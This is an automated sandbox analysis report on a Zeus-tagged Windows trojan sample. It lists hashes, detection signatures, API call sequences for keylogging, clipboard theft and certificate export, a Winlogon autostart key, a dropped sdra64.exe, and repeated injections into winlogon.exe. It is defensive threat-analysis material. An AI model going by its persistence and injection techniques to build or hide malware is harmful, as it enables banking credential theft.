Analysis Report P8jE8nmN7G

Overview

General Information

Sample Name: P8jE8nmN7G (renamed file extension from none to exe)
Analysis ID: 409287
MD5: ac514dce9416eb9e4148431016629174
SHA1: b0e1d96605cdc3da995a667a1fdc7189b67bfdcd
SHA256: 67334c1b7f629c04efefbfb466e5996a425af4a43c07a5ce51d4f142222b0de7
Tags: zeus1

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Contains VNC / remote desktop functionality (version string found)
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • P8jE8nmN7G.exe (PID: 4860 cmdline: 'C:\Users\user\Desktop\P8jE8nmN7G.exe' MD5: AC514DCE9416EB9E4148431016629174)
    • winlogon.exe (PID: 560 cmdline: MD5: F9017F2DC455AD373DF036F5817A8870)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started | Author: vburov | Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\winlogon.exe, NewProcessName: C:\Windows\System32\winlogon.exe, OriginalFileName: C:\Windows\System32\winlogon.exe, ParentCommandLine: 'C:\Users\user\Desktop\P8jE8nmN7G.exe', ParentImage: C:\Users\user\Desktop\P8jE8nmN7G.exe, ParentProcessId: 4860, ProcessCommandLine: , ProcessId: 560

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: P8jE8nmN7G.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Windows\SysWOW64\sdra64.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Multi AV Scanner detection for submitted file
Source: P8jE8nmN7G.exe | Virustotal: Detection: 80%
Source: P8jE8nmN7G.exe | ReversingLabs: Detection: 96%
Machine Learning detection for dropped file
Source: C:\Windows\SysWOW64\sdra64.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: P8jE8nmN7G.exe | Joe Sandbox ML: detected
Source: 0.1.P8jE8nmN7G.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen3
Source: 0.0.P8jE8nmN7G.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_004100F6 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_004100F6
Source: P8jE8nmN7G.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_0040C174 PathCombineW,FindFirstFileW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,0_2_0040C174
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_00411D26 PathCombineW,FindFirstFileW,PathCombineW,PathCombineW,FindNextFileW,FindClose,0_2_00411D26
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_004079FA ExpandEnvironmentStringsW,FindFirstFileW,PathRemoveFileSpecW,PathCombineW,FindNextFileW,FindClose,0_2_004079FA
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_00415582 FindFirstFileW,FindClose,FindFirstFileW,FindClose,CreateMutexW,MoveFileExW,0_2_00415582
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_00404AB1 PathCombineW,FindFirstFileW,PathCombineW,WaitForSingleObject,RtlEnterCriticalSection,PathMatchSpecW,PathCombineW,wnsprintfW,WaitForSingleObject,RtlLeaveCriticalSection,Sleep,FindNextFileW,FindClose,0_2_00404AB1
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_004104CA select,recv,0_2_004104CA
Source: P8jE8nmN7G.exe, 00000000.00000002.464936104.0000000002563000.00000004.00000040.sdmp | String found in binary or memory: https://onlineeast#.bankofamerica.com/cgi-bin/ias/
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_00405F48 GetClipboardData,GlobalFix,GlobalUnWire,0_2_00405F48
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_004060AA GetTickCount,GetCurrentProcessId,wnsprintfW,GetKeyState,GetKeyState,GetKeyboardState,ToUnicode,WideCharToMultiByte,0_2_004060AA
Source: P8jE8nmN7G.exe, 00000000.00000002.464351346.000000000072A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_00414119 OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation,0_2_00414119
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_00405C8F NtQueryDirectoryFile,NtQueryObject,lstrcmpiW,0_2_00405C8F
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_004096D8 NtdllDefWindowProc_A,0_2_004096D8
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_004076BC NtQueryInformationProcess,CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,NtCreateThread,0_2_004076BC
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_0040B798 CreateFileW,NtQueryObject,lstrcpyW,CloseHandle,0_2_0040B798
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_0040BDF2 GetProcAddress,LoadLibraryA,GetProcAddress,FreeLibrary,GetForegroundWindow,GetWindowThreadProcessId,OpenProcess,OpenProcessToken,CloseHandle,DuplicateTokenEx,LoadLibraryA,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CreateProcessW,CloseHandle,CloseHandle,0_2_0040BDF2
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_0040C268 ExitWindowsEx,0_2_0040C268
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | File created: C:\Windows\SysWOW64\sdra64.exe
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_00410003
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_004102DA
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_00413758
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_00551738
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Section loaded: ntmarta.dll
Source: P8jE8nmN7G.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: P8jE8nmN7G.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: sdra64.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/2@0/0
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_004046EE CertOpenSystemStoreW,PFXExportCertStore,PFXExportCertStore,GetSystemTime,wnsprintfW,CertDuplicateCertificateContext,CertDeleteCRLFromStore,CertEnumCertificatesInStore,CertCloseStore,0_2_004046EE
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_0041158D OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,0_2_0041158D
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_004061FF CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,Process32NextW,FindCloseChangeNotification,0_2_004061FF
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Mutant created: \Sessions\1\BaseNamedObjects\_AVIRA_21099
Source: P8jE8nmN7G.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: P8jE8nmN7G.exe | Virustotal: Detection: 80%
Source: P8jE8nmN7G.exe | ReversingLabs: Detection: 96%
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | File read: C:\Users\user\Desktop\P8jE8nmN7G.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Unpacked PE file: 0.2.P8jE8nmN7G.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;.data:W;.reloc:R;.data1:W;
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_0040B4E1 LoadLibraryA,GetProcAddress,0_2_0040B4E1
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_00551615 push edi; ret 0_2_0055161C
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_005519C3 pushad ; retf 0_2_005519C4
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_005513FB push edi; iretd 0_2_00551405
Source: initial sample | Static PE information: section name: .text entropy: 7.22037238545
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | File created: C:\Windows\SysWOW64\sdra64.exe

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon userinit
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_0040970D LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadCursorW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,0_2_0040970D
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\sdra64.exe
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe TID: 4896 | Thread sleep count: 209 > 30
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_0040C174 PathCombineW,FindFirstFileW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,0_2_0040C174
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_00411D26 PathCombineW,FindFirstFileW,PathCombineW,PathCombineW,FindNextFileW,FindClose,0_2_00411D26
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_004079FA ExpandEnvironmentStringsW,FindFirstFileW,PathRemoveFileSpecW,PathCombineW,FindNextFileW,FindClose,0_2_004079FA
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_00415582 FindFirstFileW,FindClose,FindFirstFileW,FindClose,CreateMutexW,MoveFileExW,0_2_00415582
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_00404AB1 PathCombineW,FindFirstFileW,PathCombineW,WaitForSingleObject,RtlEnterCriticalSection,PathMatchSpecW,PathCombineW,wnsprintfW,WaitForSingleObject,RtlLeaveCriticalSection,Sleep,FindNextFileW,FindClose,0_2_00404AB1
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_00405B6F LdrGetProcedureAddress,0_2_00405B6F
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_0040B4E1 LoadLibraryA,GetProcAddress,0_2_0040B4E1
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_0040B585 HeapCreate,GetProcessHeap,GetCurrentProcessId,IsBadHugeReadPtr,GetUserDefaultUILanguage,GetUserNameW,0_2_0040B585
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBF9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBFB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC19000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC1B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC39000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC3B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC59000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC5B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC79000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC7B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC99000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC9B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCB9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCBB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCD9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCDB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCF9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCFB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD19000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD1B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD39000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD3B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD59000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD5B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD79000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD7B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD99000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD9B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDB9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDBB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDD9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDDB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDF9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDFB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE19000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE1B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE20000 protect: page no accessJump to behavior
